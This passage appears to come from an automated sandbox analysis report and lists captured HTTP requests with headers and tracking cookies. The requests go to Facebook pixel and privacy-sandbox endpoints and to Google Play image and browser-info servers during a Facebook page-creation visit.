2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112%2C199%2C198%2C200%2C205%2C206%2C207%2C203%2C195%2C131%2C133%2C162%2C194%2C196%2C121%2C156%2C144%2C150%2C188%2C189%2C128%2C231%2C115%2C125%2C126%2C232%2C164%2C118%2C234%2C165%2C135%2C122%2C153%2C147%2C113%2C127 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /DZtnSdEJ1VyGYxzK18Ky0dsC3ILexQDDsC-V1r4AQxrv3dNEiLgbCQQTdK9XQ69HF7RS=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /xZ9aAAGs60bJitt4kftzG2JSgo6rpZoII33fpvOxT17217hebF4c57DA_NNns7pktTw=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /j30yV01OUMEhaI4qDdl3LDL3aXKq3aNm_4mImGzNxTkPAVCa6D9cKvkMTh0UwEnJvj4=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /xlL2RGPKorMz9nqE1bio8ceqIRMlv9_X77ULaavTlx5NOU71SmqZTD6BYf4DYCxVBs8=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tr/?batch=1&events[0]=id%3D1668333663438923%26ev%3DPageView%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585677869%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26ec%3D0%26o%3D4126%26cs_est%3Dtrue%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585670565%26coo%3Dfalse%26exp%3Df1&events[1]=id%3D221433308641448%26ev%3DPageView%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585677871%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26ec%3D0%26o%3D4126%26cs_est%3Dtrue%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585670565%26coo%3Dfalse%26exp%3Df3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1668333663438923&ev=PageView&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585677869&sw=1280&sh=1024&v=2.9.169&r=stable&ec=0&o=4126&cs_est=true&ler=empty&cdl=API_unavailable&it=1727585670565&coo=false&exp=f1&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source=navigation-source, triggerReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=221433308641448&ev=PageView&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585677871&sw=1280&sh=1024&v=2.9.169&r=stable&ec=0&o=4126&cs_est=true&ler=empty&cdl=API_unavailable&it=1727585670565&coo=false&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger, event-source=navigation-sourceReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /ajax/webstorage/process_keys/?state=1 HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /signals/config/1362649510502605?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112%2C199%2C198%2C200%2C205%2C206%2C207%2C203%2C195%2C131%2C133%2C162%2C194%2C196%2C121%2C156%2C144%2C150%2C188%2C189%2C128%2C231%2C115%2C125%2C126%2C232%2C164%2C118%2C234%2C165%2C135%2C122%2C153%2C147%2C113%2C127 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /GOsdMmikeSBOblYF_chfJHF_4N2xhGhZ3AtVC70mzi_BdM6cJs_T0SbyRSHJZX6xt0In=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tr/?batch=1&events[0]=id%3D1668333663438923%26ev%3DPageView%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585677869%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26ec%3D0%26o%3D4126%26cs_est%3Dtrue%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585670565%26coo%3Dfalse%26exp%3Df1&events[1]=id%3D221433308641448%26ev%3DPageView%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585677871%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26ec%3D0%26o%3D4126%26cs_est%3Dtrue%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585670565%26coo%3Dfalse%26exp%3Df3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /tr/?batch=1&events[0]=id%3D1362649510502605%26ev%3DPageCreationOnboardingFlow%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585680341%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26a%3Donsite_js_fbq%26ec%3D0%26o%3D4126%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585670565%26coo%3Dfalse%26tm%3D1%26exp%3Df3&events[1]=id%3D1362649510502605%26ev%3DPageView%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585680343%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26a%3Donsite_js_fbq%26ec%3D1%26o%3D4126%26cs_est%3Dtrue%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585670565%26coo%3Dfalse%26exp%3Df3&events[2]=id%3D1362649510502605%26ev%3DPageCreationOnboardingFlow%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585680344%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26a%3Donsite_js_fbq%26ec%3D2%26o%3D4126%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585670565%26coo%3Dfalse%26tm%3D1%26exp%3Df3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1668333663438923&ev=PageView&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585677869&sw=1280&sh=1024&v=2.9.169&r=stable&ec=0&o=4126&cs_est=true&ler=empty&cdl=API_unavailable&it=1727585670565&coo=false&exp=f1&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1362649510502605&ev=PageCreationOnboardingFlow&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585680341&sw=1280&sh=1024&v=2.9.169&r=stable&a=onsite_js_fbq&ec=0&o=4126&ler=empty&cdl=API_unavailable&it=1727585670565&coo=false&tm=1&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger, event-source;navigation-sourceReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1362649510502605&ev=PageView&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585680343&sw=1280&sh=1024&v=2.9.169&r=stable&a=onsite_js_fbq&ec=1&o=4126&cs_est=true&ler=empty&cdl=API_unavailable&it=1727585670565&coo=false&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, triggerReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=221433308641448&ev=PageView&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585677871&sw=1280&sh=1024&v=2.9.169&r=stable&ec=0&o=4126&cs_est=true&ler=empty&cdl=API_unavailable&it=1727585670565&coo=false&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1362649510502605&ev=PageCreationOnboardingFlow&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585680344&sw=1280&sh=1024&v=2.9.169&r=stable&a=onsite_js_fbq&ec=2&o=4126&ler=empty&cdl=API_unavailable&it=1727585670565&coo=false&tm=1&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: not-navigation-source, trigger, event-sourceReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /tr/?batch=1&events[0]=id%3D1362649510502605%26ev%3DPageCreationOnboardingFlow%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585680341%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26a%3Donsite_js_fbq%26ec%3D0%26o%3D4126%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585670565%26coo%3Dfalse%26tm%3D1%26exp%3Df3&events[1]=id%3D1362649510502605%26ev%3DPageView%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585680343%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26a%3Donsite_js_fbq%26ec%3D1%26o%3D4126%26cs_est%3Dtrue%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585670565%26coo%3Dfalse%26exp%3Df3&events[2]=id%3D1362649510502605%26ev%3DPageCreationOnboardingFlow%26dl%3Dhttps%253A%252F%252Fwww.facebook.com%252Fpages%252Fcreate%252F%253Fref_type%253Dregistration_form%26rl%3D%26if%3Dfalse%26ts%3D1727585680344%26sw%3D1280%26sh%3D1024%26v%3D2.9.169%26r%3Dstable%26a%3Donsite_js_fbq%26ec%3D2%26o%3D4126%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727585670565%26coo%3Dfalse%26tm%3D1%26exp%3Df3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1362649510502605&ev=PageCreationOnboardingFlow&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585680341&sw=1280&sh=1024&v=2.9.169&r=stable&a=onsite_js_fbq&ec=0&o=4126&ler=empty&cdl=API_unavailable&it=1727585670565&coo=false&tm=1&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1362649510502605&ev=PageView&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585680343&sw=1280&sh=1024&v=2.9.169&r=stable&a=onsite_js_fbq&ec=1&o=4126&cs_est=true&ler=empty&cdl=API_unavailable&it=1727585670565&coo=false&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /ajax/webstorage/process_keys/?state=1 HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1362649510502605&ev=PageCreationOnboardingFlow&dl=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate%2F%3Fref_type%3Dregistration_form&rl=&if=false&ts=1727585680344&sw=1280&sh=1024&v=2.9.169&r=stable&a=onsite_js_fbq&ec=2&o=4126&ler=empty&cdl=API_unavailable&it=1727585670565&coo=false&tm=1&exp=f3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /data/manifest/ HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /_/PlayStoreUi/browserinfo?f.sid=-4709349331996553121&bl=boq_playuiserver_20240925.10_p0&hl=ru&gl=US&authuser&soc-app=121&soc-platform=1&soc-device=1&_reqid=403233&rt=j HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.3.1233940498.1727585630; _gcl_au=1.1.303246603.1727585631; _ga=GA1.1.1369306439.1727585630; OTZ=7754694_72_76_104100_72_446760; 